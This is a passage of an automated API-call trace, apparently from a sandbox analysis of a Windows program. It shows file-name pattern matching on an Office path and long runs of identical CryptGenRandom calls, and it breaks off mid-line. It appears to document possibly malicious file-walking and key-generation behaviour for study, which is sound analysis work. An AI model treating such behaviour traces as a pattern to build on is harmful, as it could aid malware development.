[0162.102] PathMatchSpecW (pszFile="pkeyconfig-office.xrm-ms", pszSpec="*firefox*") returned 0 [0162.102] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms", pszSpec="*") returned 1 [0162.102] strlen (_Str="NMoreira") returned 0x8 [0162.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0162.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 